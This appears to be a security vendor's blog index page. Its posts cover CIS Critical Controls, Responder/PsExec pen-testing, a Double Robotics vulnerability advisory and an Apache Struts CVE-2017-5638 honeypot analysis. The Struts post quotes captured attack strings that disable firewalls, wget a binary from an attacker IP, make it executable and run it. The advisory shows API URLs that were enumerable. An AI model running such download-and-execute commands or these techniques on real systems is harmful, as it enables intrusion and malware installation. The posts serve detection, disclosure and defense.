Skip navigation
All Places > Information Security > Blog
1 2 3 Previous Next

Information Security

741 posts

The ultimate goal of an information security program is to reduce risk. Often, hidden risks run amok in organizations that just aren’t thinking about risk in the right way. Control 5 of the CIS Critical Security Controls can be contentious, can cause bad feelings, and is sometimes hated by system administrators and users alike. It is, however, one of the controls that can have the largest impact on risk. Therefore it is an important control, and the conversation around why it is important is also important. We’ll talk about both.

 

remote-control-149842_960_720.pngMisuse of privilege is a primary method for attackers to land and expand inside networks. Two very common attacks rely on privilege to execute. The first is when a user running with privilege is tricked into opening a malicious attachment, or gets malware from a drive-by website, such as malware which loads silently in the background. Privileged accounts just make these attacks succeed quickly, and user machines can be controlled, or keylogging can be installed, or running malicious processes can be hidden from view.

 

The second common technique is the elevation of privilege when guessing or cracking a password for an administrative user and gaining access on a target machine. Especially if the password policy is weak (8 characters is not sufficient!) or not enforced, the risk increases.

 

What it is

Reducing administrative privilege specifically means running services or accounts without admin level access all the time. This does not mean that no one should have admin, it means admin privilege should be heavily restricted to only those users whose jobs, and more specifically tasks, require admin privilege.

 

Regular, normal users of a system should never require admin privilege to do daily tasks. Superusers of a system might require admin access for certain tasks, but don’t necessarily need it all the time. Even system administrators do not require admin level access 100% of the time to do their jobs. Do you need admin access to read & send emails? Or search the web?

 

 

How to implement it

There’s a lot of different ways to implement restrictions on admin privilege. You are first going to have to deal with the political issues of why to do this. Trust me, addressing this up front saves you a lot of heartache later on.

 

The political stuff

Case #1: All users have admin, either local admin and/or admin account privileges

 

My first question, when I see this happening in any organization, is “why do they need this?”

 

Typical answers are:

  • They need to install software [HINT: no they don’t.]
  • Applications might fail to work [Possible but unlikely, the app just might be installed improperly.]
  • They need it to print !!! [No.]
  • My executives demand it [They demand a lot in IT without understanding. Help them understand. See below.]
  • Why not? [Seriously?]

 

All of these Some of these are valid responses. The problem is we don’t understand the root issue that’s driving the reason that everyone needs admin level access to do their daily duties. And this is probably true of many organizations. It’s simpler just to give admin access because things will then work, but you create loads of risk when you do this. You have to take the time to determine what functions actually need the access, and remove this access from those functions that don’t require it, to lower the risk and the attack surface.

 

All of these responses speak to worries about not being able to do a business function when they need to. They also imply that the people in charge of approving these permissions really don’t understand the risks associated with imparting them. We need to get them to understand the lowered risks of possibly needing admin once or twice, and much higher risks of having it when attackers strike.

 

Case #2: Your admins say they have to have it “to do their jobs”

 

I don’t disagree with this statement. Admins do need admin rights to do some tasks. But not every task calls for it. Do this exercise: list all the daily tasks an admin does on an average day. Then, mark each task which does not require admin privilege to accomplish. Show that list to the person responsible for managing risk in your organization. Then simply create a separate, normal user account for your admins, and require them to use it for all those tasks that are marked. For all other tasks, they escalate into their admin account and then de-escalate when done. It's an extra step, and it is a secure one.

 

The conversation

cranium-2028558__480.png

Now have the conversation. It may be painful. I have actually been in meetings where people got so mad they threw things, and would be in tears when we told them we were “taking away” their privilege. This is why we say “reducing” or "controlling.” These are important words. The phrase is “we’re reducing/controlling risk by allowing you to use your privilege only for tasks that require it.” For executives that demand it, point out they are the highest risk to the organization due to their status and are frequently a high value target sought by attackers.

 

Then you support your conversation with information from around the web, whitepapers, studies, anything that helps drive your point.

 

For example this article from Avecto illustrates 97% of critical Windows vulnerabilities are mitigated when reducing admin privilege. Allowing you to focus on the remaining 3%, and be more effective. Search around, there’s lots more good supporting material.

 

This does not need to be an expensive exercise. Using techniques like Windows delegation of authority, you can give administrative privilege to users for specific tasks, like delegating to your help desk the ability to disable accounts or move them to different OUs. They don’t need full admin to do this. On linux systems, using sudo instead of root interactively is much less risky.

 

If you are a compliance-driven organization, most compliance requirements state reduction of admin is required as part of access controls. Here’s a brief glimpse of some compliance requirements that are addressed by Control 5:

 

  • PCI Compliance Objective “Implement strong access control measures”
    • Sections 7.1, 7.2, 7.3, 8.1, 8.2, 8.3, 8.7

 

  • HIPAA Compliance 164.308(a)(4)(ii)(B)
    • Rights and/or privileges should be granted to authorized users based on a set of access rules that the covered entity is required to implement as part of § 164.308(a)(4), the Information Access Management standard under the Administrative Safeguards section of the Rule.

 

  • FFIEC (Federal Financial Institutions Examination Council)
    • Authentication and Access Controls

 

The technical stuff

Reducing admin privilege supports the Pareto principle, or the 80/20 rule. Effectively, reducing admin privilege, combined with the first four CIS critical security controls, can reduce the risks in your organization by 80% or more. This allows you to focus on the remaining 20%. It’s very likely the risk factor reduction is even higher! The Australian Signals Defence Directorate lists reducing admin in its Top 4 Mitigation Strategies, along with elements from Control 2 by using application whitelisting, and Control 4 by having an ongoing patching program.

 

Here is Microsoft’s guidance on implementing Least-Privilege Administrative Models. If you use Active Directory and are on a Windows domain this is very helpful in making meaningful changes to your admin models.

 

For Linux environments, each sysadmin should have a separate account. Enforce them using the ‘su’ command to gain root. Better yet is disabling su and enforcing the use of the ‘sudo’ command.

 

There are also 3rd parties who sell software which can help with this, such as CyberArk Viewfinity, Avecto PrivilegeGuard, BeyondTrust Powerbroker or Thycotic Privilege Manager. Note Rapid7 does not partner with these companies, but we recommend them based on what we see other organizations deploying.

 

All the other things

As with most of the controls, the sub-controls also list other precautions.

 

  • Change all default passwords on all deployed devices
  • Use multi-factor authentication for all administrative access
  • Use long passwords (14 characters or more)
  • Require system admins to have a normal account and a privileged account, and access the privileged account through an escalation mechanism, such as sudo for Linux or RunAs for Windows.
  • Configure systems to issue alerts on unsuccessful logins to admin accounts. Rapid7 offers products such as InsightIDR which can detect and alert on these events. A use case might be if an admin leaves for vacation, you monitor their account and if you see any login attempts, it triggers an investigation.
  • As an advanced control, admin tasks can only be performed on machines which are air-gapped from the rest of the network, and only connect to systems they need to administer.

 

Reducing or controlling admin is not hard to implement. However, it is a change to the way things are being done, and fear of change is very powerful. Do your best to have conversations to ease the fear. You are not taking anything away. You are simply making it harder for errors to occur which have large impact, and you are reducing the risk that an attacker can easily comprise an account, a system, fileshares, sensitive data, and more.

 

Related Resources

 

CIS Critical Control 1: Inventory of Authorized and Unauthorized Devices Explained

CIS Critical Control 2: Inventory of Authorized and Unauthorized Software Explained

CIS Critical Control 3: Secure Configurations for Hardware & Software Explained

CIS Critical Control 4: Continuous Vulnerability Assessment & Remediation

By Emilie St-Pierre, TJ Byrom, and Eric Sun

 

Ask any pen tester what their top five penetration testing tools are for internal engagements, and you will likely get a reply containing nmap, Metasploit, CrackMapExec, SMBRelay and Responder.

 

 

An essential tool for any whitehat, Responder is a Python script that listens for Link-Local Multicast Name Resolution (LLMNR), Netbios Name Service (NBT-NS) and Multicast Domain Name System (mDNS) broadcast messages (Try saying that out loud 5 times in a row!). It is authored and maintained by Laurent Gaffie and is available via its GitHub repository, located at https://github.com/lgandx/Responder.

 

Once you find yourself on an internal network, Responder will quickly and stealthily get user hashes when systems respond to the broadcast services mentioned above. Those hashes can then be cracked with your tool of choice. As Responder’s name implies, the script responds to the broadcast messages sent when a Windows client queries a hostname that isn’t located within the local network’s DNS tables. This is a common occurrence within Windows networks, and a penetration tester doesn’t need to wait too long before capturing such broadcast traffic. Behold our beautiful diagram to help visualize this concept:

 

Due to the client viewing any reply as legitimate, Responder is able to send its own IP as the query answer, no questions asked. Once received, the client then sends its authentication details to the malicious IP, resulting in captured hashes. And believe us, it works - we’ve seen penetration testers get hashes in a matter of seconds using this tool, which is why it is used early within an internal engagement’s timeline.

 

If no hashes are captured via the first method, Responder can be also be used to man-in-the-middle Internet Explorer Web-Proxy Autodiscovery Protocol (WPAD) traffic. In a similar manner to the previous attack, Responder replies with its own IP address for clients querying the network for the “wpad.dat” Proxy Auto-Config (PAC) file. If successful, Responder once again grabs the hashes which can then be cracked, or if time is of the essence, used to pass-the-hash with PsExec (PsExec examples) as we will demonstrate below.

Once hashes have been captured, it’s time to get cracking! Responder saves all hashes as John Jumbo compliant outputs and a SQLite database. A reliable cracking tool such as John the Ripper can be used to complete this step. Even if cracking is unsuccessful, hashes can be used to validate access to other areas of the target network. This is the beauty of using Responder in conjunction with PsExec.

 

PsExec is a Windows-based administrative tool which can be leveraged to move laterally around the target network. It is useful to launch executables, command prompts and processes on systems. There are numerous tools available for penetration testers who wish to take advantage of PsExec’s availability within a network. For example, Metasploit has over 7 PsExec-related modules, its most popular ones being psexec and psexec_psh. There’s also the previously-mentioned Windows executable and Core Security’s impacket psexec python script. All are potential options depending on the penetration tester’s preferences and tool availability.

 

 

 

Many networks today struggle to reliably detect remote code execution, which is why it’s very common for penetration testers to use Responder and PsExec in the early stages of an engagement. This is due to default Windows environment configurations, as well as protocol-specific behavior which by default trusts all responses. 

 

Fortunately, such attacks can be prevented and detected. To mitigate the first attack we mentioned using Responder’s broadcast attacks, these can be prevented by disabling LLMNR and NBT-NS. Since networks already use DNS, these protocols aren’t required unless you’re running certain instances of Windows 2000 or earlier (in which case, we recommend a New Year’s resolution of upgrading your systems!).

 

To prevent the second showcased Responder attack caused by WPAD traffic, it is simply a matter of adding a DNS entry for ‘WPAD’ pointing to the corporate proxy server. You can also disable the Autodetect Proxy Settings on your IE clients to prevent this attack from happening.

 
If your company uses Rapid7’s InsightIDR, you can detect use of either Responder or PSExec. Our development team works closely with our pen-test and incident response teams to continuously add detections across the Attack Chain. For that reason, the Insight Endpoint Agent in real-time collects the data required to detect remote code execution and other stealthy attack vectors. For a 3-minute overview on InsightIDR, our incident detection and response solution that combines User Behavior Analytics, SIEM, and EDR, check out the below video.

 

Rapid7 InsightIDR 3-Min Overview - YouTube

 

References:

https://github.com/lgandx/Responder

https://technet.microsoft.com/en-us/sysinternals/pxexec.aspx

https://community.rapid7.com/community/metasploit/blog/2013/03/09/psexec-demysti fied

https://github.com/CoreSecurity/impacket/blob/master/examples/psexec.py

http://www.openwall.com/john/

https://www.microsoft.com/en-us/download/details.aspx?id=36036

https://www.sans.org/reading-room/whitepapers/testing/pass-the-hash-attacks-tool s-mitigation-33283

Welcome to the fourth blog post on the CIS Critical Security Controls! This week, I will be walking you through the fourth Critical Control: Continuous Vulnerability Assessment & Remediation. Specifically, we will be looking at why vulnerability management and remediation is important for your overall security maturity, what the control consists of, and how to implement it.

 

Organizations operate in a constant stream of new security information: software updates, patches, security advisories, threat bulletins, etc. Understanding and managing vulnerabilities has become a continuous activity and requires a significant amount of time, attention and resources. Attackers have access to the same information, but have significantly more time on their hands. This can lead to them taking advantage of gaps between the appearance of new knowledge and remediation activities.

 

By not proactively scanning for vulnerabilities and addressing discovered flaws, the likelihood of an organization's computer systems becoming compromised is high. Kind of like building and implementing an ornate gate with no fence. Identifying and remediating vulnerabilities on a regular basis is also essential to a strong overall information security program.

 

What it is:

The Continuous Vulnerability Assessment and Remediation control is part of the “systems” group of the 20 critical controls. This control consists of eight (8) difference sections with 4.1 and 4.3 giving guidelines around performing vulnerability scans, 4.2 and 4.6 talk about the importance of monitoring and correlating logs, 4.4 addresses staying on top of new and emerging vulnerabilities and exposures, 4.5 and 4.7 pertains to remediation, and 4.8 talks about establishing a process to assign risk ratings to vulnerabilities.

 

How to implement it

To best understand how to integrate each section of this control into your security program, we’re going to break them up into the logical groupings I described in the previous section (scanning, logs, new threats and exposures, risk rating, and remediation).

 

A large part of vulnerability assessment and remediation has to do with scanning, as proven by the fact that two sections directly pertain to scanning and two others indirectly reference it by discussing monitoring scanning logs and correlating logs to ongoing scans. The frequency of scanning will largely depend on how mature your organization is from a security standpoint and how easily it can adopt a comprehensive vulnerability management program. Section 4.1 specifically states that vulnerability scanning should occur weekly, but we know that that is not always possible due to various circumstances. This may mean monthly for organizations without a well-defined vulnerability management process or weekly for those that are better established. Either way, when performing these scans it is important to have both an internal and external scan perspective. This means that scans on machines that are internally-facing only should have authenticated scans performed on them and outward-facing devices should have both authenticated and unauthenticated scans performed.

 

Another point to remember about performing authenticated scans is that the administrative account being used for scans should not be tied to any particular user. Since these credentials will have administrative access to all devices being scanned, we want to decrease the risk of them getting compromised. This is also why it is important to ensure all of your scanning activities are being logged, monitored, and stored.

 

Depending on the type of scan you are running, your vulnerability scanner should be generating at least some attack detection events. It is important that your security team is able to (1) see that these events are being generated and (2) can match them to scan logs in order to determine whether the exploit was used against a target known to be vulnerable instead of being part of an actual attack. Additionally, scan logs and alerts should be generated and stored to track when and where the administrative credentials were being used. This way, we can determine that the credentials are only being used during scans on devices for which the use of those credentials has been approved.

 

So now that we have discussed scanning and logs, we are going to address how you can keep up with all of the vulnerabilities being released. There are several sites and feeds that you can subscribe to in order to stay on top of new and emerging vulnerabilities and exposures. Some of our favorite places are:

 

It isn’t enough to just be alerted to new vulnerabilities, however, we need to take the knowledge we have about our environment into consideration and then determine how these vulnerabilities will impact it. This is where risk rating comes into play. Section 4.8 states that we must have a process to risk-rate a vulnerability based on exploitability and potential impact and then use that as guidance for prioritization of remediation. What it doesn’t spell out for us is what this process looks like. Typically, when we work with an organization, we recommend that for each asset they take three factors into consideration:

  1. Threat Level – How would you classify the importance of the asset in terms of the data it hosts as well as its exposure level? For example, a web server may pose a higher level of threat than a device that isn’t accessible via the Internet.
  2. Risk of Compromise – What is the likelihood that the vulnerability will compromise this system? Something to keep in mind is how easy is it to exploit this vulnerability, does it require user interaction, etc.
  3. Impact of Compromise –What is the impact to the confidentiality, integrity, and availability of the system and data it hosts should a particular vulnerability gets exploited?

 

After our scans are complete and we are staring at the long list of vulnerabilities found on our systems, we need to determine the order in which we will do remediation.

 

In order to ensure patches are being applied across all systems within the organization, it is recommended to deploy and use an automated patch management tool as well as a software update tool. As you look to increase the overall security maturity of your organization, you will see that these tools are necessary if you want to have a standardized and centrally managed patching process. In more mature organizations, part of the remediation process will include pushing patches, updates, and other fixes to a single host initially. When the patching efforts are complete on this one device, the security team then performs a scan of that device in order to ensure the vulnerability was remediated prior to pushing the fix across the entire organization via the aforementioned tools. Tools are not enough to ensure that patches were fully and correctly applied, however. Vulnerability management is an iterative process, which means that vulnerability scans that occurs after remediation should be analyzed to ensure that vulnerabilities that were supposed to be remediated are no longer showing upon the report.

 

Vulnerability management software helps you identify the holes that can be used during an attack and how to seal them before a breach happens. But it’s more than launching scans and finding vulnerabilities; it requires you to create processes around efficient remediation and to ensure that the most critical items are being fixed first. What you do with the data you uncover is more important than simply finding vulnerabilities, which is why we recommend integrating the processes around each section of Critical Control 4.

 

Related Resources

 

This post describes three vulnerabilities in the Double Robotics Telepresence Robot ecosystem related to improper authentication, session fixation, and weak Bluetooth pairing. We would like to thank Double Robotics for their prompt acknowledgement of the vulnerabilities, and in addressing the ones that they considered serious. Two of the three vulnerabilities were patched via updates to Double Robotics servers on Mon, Jan 16, 2017.

 

Credit

These issues were discovered by Rapid7 researcher Deral Heiland. They were reported to Double Robotics and CERT/CC in accordance with Rapid7's disclosure policy.

 

Product Affected

The Double Telepresence Robot is a mobile conferencing device. Its mobility allows the remote user to roam around an office for meetings and face-to-face conversations.

 

Vendor Statement

From Double Robotics' co-founder and CEO, David Cann:

At Double Robotics, we seek to provide the best experience possible for our customers, which means not only providing an agile, innovative technology, but also, the highest level of safety and security. Rapid7's thorough penetration tests ensure all of our products run as securely as possible, so we can continue delivering the best experience in telepresence. Before the patches were implemented, no calls were compromised and no sensitive customer data was exposed. In addition, Double uses end-to-end encryption with WebRTC for low latency, secure video calls.

 

Summary of Vulnerabilities

  • R7-2017-01.1: Unauthenticated access to data
    • An unauthenticated user could gain access to Double 2 device information including: device serial numbers, current and historical driver and robot session information, device installation_keys, and GPS coordinates.
  • R7-2017-01.2: Static user session management
    • The access token (also referred to as the driver_token) which is created during account assignment to a Robot was never changed or expired. If this token was compromised, it could be used to take control of a robot without a user account or password.
  • R7-2017-01.3: Weak Bluetooth pairing
    • The pairing process between the mobile application (iPad) and robot drive unit does not require the user to know the challenge PIN. Once paired with the robot drive unit, a malicious actor can download the Double Robot mobile application from the Internet and use it (along with the web services) to take control of the drive unit.

 

Vulnerability Details and Mitigations

R7-2017-01.1: Unauthenticated access to data

In the following example, critical information related to a session was accessed using the URL “https://api.doublerobotics.com/api/v1/session/?limit=1&offset=xxxxxxx&format=jso n” By incrementing the "offset=" number, information for all historical and current sessions could be enumerated:

 

f2.png

 

In the next example, robot and user installation keys were enumerated by incrementing the "offset=" number in the URL https://api.doublerobotics.com/api/v1/installation/?limit=1&offset=xxxxxxx&forma t=json as shown below:

 

f3.png

 

On Mon, Jan 16, 2017, Double deployed a server patch to mitigate this issue.

R7-2017-01.2: Static user session management

Although the driver_token is a complex, unique, 40-character token (and so unlikely to be guessed), it can still be enumerated by anyone who has access to the Double Robot iPad or is successful in creating an SSL man-in-the-middle attack against the device. For example, via a successful man-in-the middle attack or access to the robot iPad's cache.db file, a malicious actor could identify the robot_key as shown below:

 

f4.png

 

f5.png

 

Using this robot_key, an unauthenticated user could enumerate all of the user access tokens (driver_tokens) which allow remote control access of the robot. An example of this enumeration method is shown below:

 

f6.png

 

On Mon, Jan 16, 2017, Double Robotics deployed a server patch to mitigate this issue. The API queries described above no longer expose related session tokens to the Double device.

 

R7-2017-01.3: Weak Bluetooth pairing

The exposure of this vulnerability is limited since the unit can only be paired with one control application at a time. In addition, the malicious actor must be close enough to establish a Bluetooth connection. This distance can be significant (up to 1 mile) with the addition of a high-gain antenna.

 

On Mon, Jan 16, 2017, Double Robotics indicated it did not see this as a significant security vulnerability, and that it does not currently plan to patch. Users should ensure that the driver assembly remains paired to the control iPad to avoid exposure.

 

Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Dec 2016: Discovered by Rapid7's Deral Heiland
  • Mon, Jan 09, 2017: Disclosed to Double Robotics
  • Mon, Jan 09, 2017: Double Robotics acknowledged the vulnerabilities
  • Mon, Jan 16, 2017: R7-2017-01.1 and R7-2017-01.2 were fixed by Double Robotics via server patches
  • Tue, Jan 24, 2017: Disclosed to CERT/CC
  • Wed, Jan 25, 2017: Rapid7 and CERT/CC decided to not issue CVEs for these vulnerabilities. R7-2017-01.01 and 01.02 were present in Double's web application server. As there was only one instance of the affected software, and no user action was required to apply the fixes, no CVE is warranted. R7-2017-01.03 is a exposure for users to be aware of, but it only allows control of the drive unit if pairing is successful. User data cannot be modified without additional compromise.
  • Sun, Mar 12, 2017: Disclosed to the public

Stop number 3 on our tour of the CIS Critical Security Controls (previously known as the SANS Top 20 Critical Security Controls) deals with Secure Configurations for Hardware & Software. This is great timing with the announcement of the death of SHA1. (Pro tip: don’t use SHA1). The Critical Controls are numbered in a specific way, following a logical path of building foundations while you gradually improve your security posture and reduce your exposure. Control 1: Inventory of Authorized and Unauthorized Devices, and Control 2: Inventory of Authorized and Unauthorized Software are foundational to understanding what you have. Now it’s time to shrink that attack surface by securing the inventory in your network.

 

As stated in the control description, default configurations for operating systems and applications are normally geared toward ease-of-deployment and not toward security. This means open and running ports and services, default accounts or passwords, older and more vulnerable protocols (I’m looking at YOU telnet), pre-installed and perhaps unnecessary software, and the list goes on. All of these are exploitable in their default state.

 

The big question is, what constitutes secure configurations? As with most questions in information security, the answer is all contextual, based on your business rules. So before you attempt a secure configuration, you need to have some understanding of what your business needs to do and what it does today.  This also means a lot of detailed analysis of your applications, and this can be a complex task. This is also a task that is a continuous process; it is not just “one and done.” Secure configuration must be continually managed to avoid security decay. As you implement vulnerability management, your systems and applications will be patched and updated, and this will change your position on secure configurations. Configurations will change based on new software or operational support changes, and if not secured attackers will take advantage of the opportunities to exploit both network-accessible services and client software.

 

What It Is

Secure Configurations for Hardware & Software is part of the “systems” group of the CIS critical security controls. This means that this is in the back office, by IT and security, and should not be handled by users in the front office. It’s very likely that your organization is using some kind of secure configs unless you run 100% out-of-the-box. Rapid7 finds that most orgs do not go far enough, and a lot of exposure exists that has no defined business purpose or need.

 

This control is broken down into seven sub-controls. The sub-controls describe the entire process of managing secure configurations, but do not go into specifics about the configurations themselves. So we will cite resources here you can use to help you start to securely configure your enterprise (and even your home systems).

 

How to Implement It

forge-1789456__480.jpg

There are many ways to go about secure configurations, and it’s likely that not everything publicly available is going to be completely relevant. Like you would with a deny all rule in a firewall deployment, approach these with a mindset of starting as small as you can and gradually opening up your systems and applications until they are usable. This is great for new systems or those yet to be deployed. But what about older systems? It’s not very likely you can just shut them down and work this process. Still, you should seek to reduce the running services and ports, especially those which are known to be vulnerable and not in use.

 

The Configs

There are a number of usable resources for secure configurations. Rapid7 regularly recommends to clients the following:

 

  • NIST 800-70 rev 3
    • This NIST special publication is a document that governs the use of checklists, it is not itself a configuration guide. It is most valuable in breaking down configuration levels for using multiple checklists. This is especially useful in complex business environments, when you will need to have many different configuration baselines for your systems. It also contains information on developing, evaluating and testing your checklists.
  • National Vulnerability Database (NVD)
    • The NVD maintained by NIST is a great repository for many things in control 4 (Vulnerability Management), and it is also useful for control 3 with their checklists. This repo contains SCAP content, Group Policy Objects for Active Directory, and human readable settings. This is a great first start for any secure configuration activity.
  • CIS Benchmarks
    • Sometimes these are referred to hardening guides, their official name is the CIS Benchmarks. Curated by the same organization that handles the Critical Controls, the CIS Benchmarks are available for multiple operating systems, web browsers, mobile devices, virtualization platforms and more. You can also get SCAP-compliant checklists in XCCDF format for direct application to systems.
  • Security Technical Implementation Guide (STIG)
    • The STIGs are curated by the federal government, adhering to rules and guidelines issued by the Department of Defense. These pages contain actual configuration templates (some in SCAP format) that can be directly applied to systems. There are also templates for cloud-based services, application security and a lot of training references. STIGs are great, but not for the faint of heart, or for organizations who don’t have a deep technical understanding of the application or OS they’re attempting to reconfigure. So handle them with caution, but they are very helpful in locking down systems.

 

Minimum Standards

All of the above resources are based on consensus and community or government standards and are considered to be sound strategies to reduce your attack surface. They are not comprehensive, and as already stated your mileage may vary and you should take a customized approach that best supports your business needs.

museum-208583_1280.jpg

At the end of the day, what you are looking to do is maintain a set of minimum standards for your configs. You can pore through the checklists to give you ideas, like disable IPv6 if it is not necessary, don’t use RDP without TLS, don’t ever run Telnet ever for any reason ever. Did I mention not to run telnet? Build your checklist and use it for all your deployments, and don’t forget about your existing and vulnerable systems! They need extra love too.

 

Rapid7 observes many organizations that know they have a vulnerable legacy system that they cannot modify directly to reduce the attack surface. If you have one of these brittle/fragile/unfixable systems, consider ways to limit inbound/outbound access and connectivity to help mitigate the risk until it can be upgraded or replaced with something more securable.

 

All The Other Things

Everything above talks about the first sub-control, which is the secure config itself. There are several more things this control covers, such as:

  • Follow strict configuration management processes for all changes to your secure builds.
  • Create master images (gold images) that are secure, and store those in a safe and secure location so they medieval-1125807_1280.jpgcan’t be altered.
  • Perform remote administration only over secure channels, and use a separate administration network if possible.
  • Use file integrity checking tools or application whitelisting tools to ensure your images are not being altered without authorization.
  • Verify your testable configurations and automate this as much as possible – run your vulnerability scanner against your gold image on a regular frequency and use SCAP to streamline reporting and integration.
  • Deploy configuration management tools (SCCM, Puppet/Chef, Casper) to enforce your secure configurations once they are deployed.

 

As you can see there’s quite a bit to getting your systems and applications secured, as well as having processes to support the ongoing care and feeding of your secure configs. This is a foundational control, so it’s important to get right and keep going with continual improvement. Putting the required time and effort into this will yield you a lot of return, simply because your exposure will have shrunk significantly, and allow you to focus on the more advanced security measures without worrying about some Powershell script kiddie popping your box because of insecure telnet. Oh, by the way, you should probably disable telnet.

 

For more posts examining the CIS Critical Security Controls, search for the tag "CIS 20."

UPDATE - March 10th, 2017: Rapid7 added a check that works in conjunction with Nexpose’s web spider functionality. This check will be performed against any URIs discovered with the suffix “.action” (the default configuration for Apache Struts apps). To learn more about using this check, read this post.

 

UPDATE - March 9th, 2017:  Scan your network for this vulnerability with check id apache-struts-cve-2017-5638, which was added to Nexpose in content update 437200607.

 

Attacks spotted in the wild

Yesterday, Cisco Talos published a blog post indicating that they had observed in-the-wild attacks against a recently announced vulnerability in Apache Struts. The vulnerability, CVE-2017-5638, permits unauthenticated Remote Code Execution (RCE) via a specially crafted Content-Type value in an HTTP request. An attacker can create an invalid value for Content-Type which will cause vulnerable software to throw an exception.  When the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed.

 

World Wide Window into the Web

For some time now Rapid7 has been running a research effort called Heisenberg Cloud. The project consists of honeypots spread across every region of five major cloud providers, as well as a handful of collectors in private networks. We use these honeypots to provide visibility into the activities of attackers so that we can better protect our customers as well as provide meaningful information to the public in general. Today, Heisenberg Cloud helped provide information about the scope and scale of the attacks on the Apache vulnerability. If in the coming days and weeks it will provide information about the evolution and lifecycle of the attacks.

 

A few words of caution before I continue: please keep in mind that the accuracy of IP physical location here is at the mercy of geolocation databases and it's difficult to tell who the current 0wner(s) of a host are at any given time. Also, we host our honeypots in cloud providers in order to provide broad samples. We are unlikely to see targeted or other scope-limited attacks.

 

Spreading malware

We use Logentries to query our Heisenberg data and extract meaningful information.  One of the aspects of the attacks is how the malicious traffic has changed over the recent days.  The graph below shows a 72 hour window in time.

 

 

The first malicious requests we saw were a pair on Tuesday, March 7th at 15:36 UTC that originated from a host in Zhengzhou, China. Both were HTTP GET requests for /index.aciton (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. Here is an example of the commands that were sent as a single string in the Content-Type value:

 

cd /dev/shm;
wget http://XXX.XXX.XXX.92:92/lmydess;
chmod 777 lmydess;
./lmydess;

 

I've broken the command into lines to make it easier to read. It's pretty standard for a command injection or remote code execution attack against web servers. Basically, move to some place writeable, download code, make sure its executable, and run it.

 

After this, the malicious traffic seemed to stop until Wednesday, March 8th at 09:02 UTC when a host in Shanghai, China started sending attacks. The requests differed from the previous attacks. The new attacks were HTTP POSTs to a couple different paths and attempted to execute different commands on the victim:

 

/etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;
wget -c http://XXX.XXX.XXX.26:9/7;
chmod 777 7;
./7;

 

This is similar to the prior commands but this attacker tries to stop the firewall first. The requested binary was not hosted on the same IP address that attacked the honeypot. In this case the server hosting the binary was still alive and we were able to capture a sample.  It appears to be a variant of the XOR DDoS family.

 

Not so innocent

Much like Talos, in addition to the attempts to spread malware, we see some exploitation of the vulnerability to run "harmless" commands such as whois, ifconfig, and a couple variations that echoed a value. The word harmless is in quotes because though the commands weren't destructive they could have allowed the originator of the request to determine if the target was vulnerable. They may be part of a research effort to understand the number of vulnerable hosts on the public Internet or an information gathering effort as part of preparation for a later attack. Irrespective of the reason, network and system owners should review their environments.

 

A little sunshine

Based on the traffic we are seeing at this time it would appear that the bulk of the non-targeted malicious traffic appears to be limited attacks from a couple of sources. This could change significantly tomorrow if attackers determine that there is value in exploiting this vulnerability. If you are using Apache Struts this would be a great time to review Apache's documentation on the vulnerability and then survey your environment for vulnerable hosts. Remember that Apache products are often bundled with other software so you may have vulnerable hosts of which you are unaware. Expect Nexpose and Metasploit coverage to be available soon to help with detection and validation efforts. If you do have vulnerable implementations of the software in your environment, I would strongly recommend upgrading as soon as safely possible. If you cannot upgrade immediately, you may wish to investigate other mitigation efforts such as changing firewall rules or network equipment ACLs to reduce risk. As always, it's best to avoid exposing services to public networks if at all possible.

 

Good luck!

What follows are some first impressions on the contents of the WikiLeaks Vault7 dump. I won't be addressing the legal or ethical concerns about posting classified data that can endanger the missions and goals of American intelligence organizations. I also won't be talking about whether or not the CIA should be involved in developing cyber capabilities in the first place as we have previously written about our views on this topic. But, I will talk about the technical content of the documents posted today, which all appear to come from a shared, cross-team internal Confluence wiki used by several CIA branches, groups, and teams.

 

After spending the last few hours poring over the newly released material from WikiLeaks, Vault7, I'm left with the impression that the activities at the CIA with regards to developing cyber capabilities are... pretty normal.

 

The material is primarily focused on the capabilities of "implants" -- applications that are installed on systems after they've been compromised -- and how they're used to exfiltrate data and maintain persistence after an initial compromise of a variety of devices from Samsung smart TVs to Apple iPhones to SOHO routers, and everything in between.

 

The material also covers the command and control infrastructure that the CIA maintains to remotely use these implants; primarily, the details are concerned with building and testing the various components that makes up this network.

 

Finally, there are the projects that are focused on exploits. The exploits described are either developed in-house, or acquired from external partners. Most of the internally developed exploits are designed to escalate privileges once access is secured, while most of the remote capabilities were acquired from other intelligence organizations and contractors. The CIA does appear to prefer to develop and use exploits that have a local, physical access component.

 

While there is still a lot left to look at in detail, the overwhelming impression that I get from reading the material is that working on offensive tech at the CIA is pretty similar to working on any software project at any tech company. More to the point, the CIA activities detailed here are eerily similar to working on Metasploit at Rapid7. Take, for example, this post about the Meterpreter Mettle project from 2015 (which was written about the same time as these documents). Tell me that Mettle doesn't read like any one of the technical overviews in Vault7.


As we spend more time digging through the Vault7 material, and if more material is released over time, I expect we'll be less and less surprised. So far, these documents show that the CIA branches and subgroups named in the documents are behaving pretty much exactly as one might expect of any software development shop. Yes, they happen to be developing exploit code. But, as we all know, that particular capability, in and of itself, isn't novel, illegal, or evil. Rapid7, along with many other security research organizations, both public and private, do it every day for normal and legitimate security purposes.

 

Until I see something that's strikingly unusual, I'm having a hard time staying worked up over Vault7.

guessing-on-a-matching-test-600.gifIf you walked the RSA Conference floor(s) in San Francisco this year, you probably needed to sit down a few times in passing the 680 vendors - not because of the distance or construction as much as from the sensory overload and Rubik’s cube challenge of matching vendors with the problems they address.

 

Since Anton Chuvakin already stole my thunder by declaring there was no theme with such effective snark it made me jealous, I want to talk about the attention-grabbing claims intended to make solutions stand out in the Times Square-like atmosphere, but instead led to difficulty for any new attendees wanting to make sense of it all.

 

“Buy this technology! It is a silver bullet.”

I was mistakenly convinced that we, as a security industry, had finally moved away from the notion that one solution could solve every security problem. Blame it on fresh-faced marketing teams or true startup believers who’ve poured their heart into a solution and cannot stand the thought of missing payroll. Whatever the cause, the 42,000 attendees were assaulted with promises such as “…prevents all device compromise, stops all ongoing attacks…” and “stop all attacks – remove AV”. Layered defense doesn’t sound sexy and it is often ridiculed as “expense-in-depth”, but it is still unfortunately a reality that no single security vendor can meet all of your needs across the triad of people, process, and technology.

 

